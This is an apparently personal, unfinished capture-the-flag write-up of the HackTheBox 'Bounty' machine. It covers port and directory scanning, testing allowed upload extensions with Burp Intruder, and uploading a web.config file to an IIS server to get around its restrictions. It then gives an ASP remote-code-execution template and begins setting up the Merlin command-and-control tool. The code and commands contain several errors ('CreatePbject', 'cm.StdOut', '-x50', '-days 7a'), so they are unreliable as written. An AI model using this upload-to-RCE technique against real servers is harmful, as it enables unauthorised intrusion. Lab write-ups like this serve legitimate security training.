Nmap result:

Nmap scan report for 10.129.161.191
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

After the initial scan, I saw that only port 80 was open so I did the port scan

gobuster dir -u http://10.129.161.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

It looks like it's unstable but I found transfer.aspx

File server found!

Let's test what extensions are allowed with burp

intercept > attach a file and upload > send it to repeater > observe the response

Make an extension list like this.

send it to intruder > clear $ > change payload name

go to payloads > payload options > load > select the file.

Start Attack

Only one of them had the content length of 1350, which was the config -> and it shows it was uploaded successfully.

Uploading Web.config files to IIS servers can bypass some security:

gobuster showed UploadedFiles directory.

Uploaded the web.config file and checked the file.

it's showing 3 so it's doing what the exploit is supposed to do.

ASP remote code Execution Template:

Set rs=CreatePbject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cm.StdOut.Readall()
Response.write(o)

Since I confirmed that it allows code execution I'm going to use the merlin

Merlin is a tool like metasploit.

We need a server cert inside the merlin/data/509 directory.

To generate, execute the command:

openssl req -x50 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=gorigori.rocks" -days 7a

After the server key is generated, run the program by typing "go run main.go"

For some reason, the box kept shutting down so I decided to stop working on it.

Full walkthrough is available from here: https://medium.com/@v1per/bounty-hackthebox-writeup-5b79a79e6de9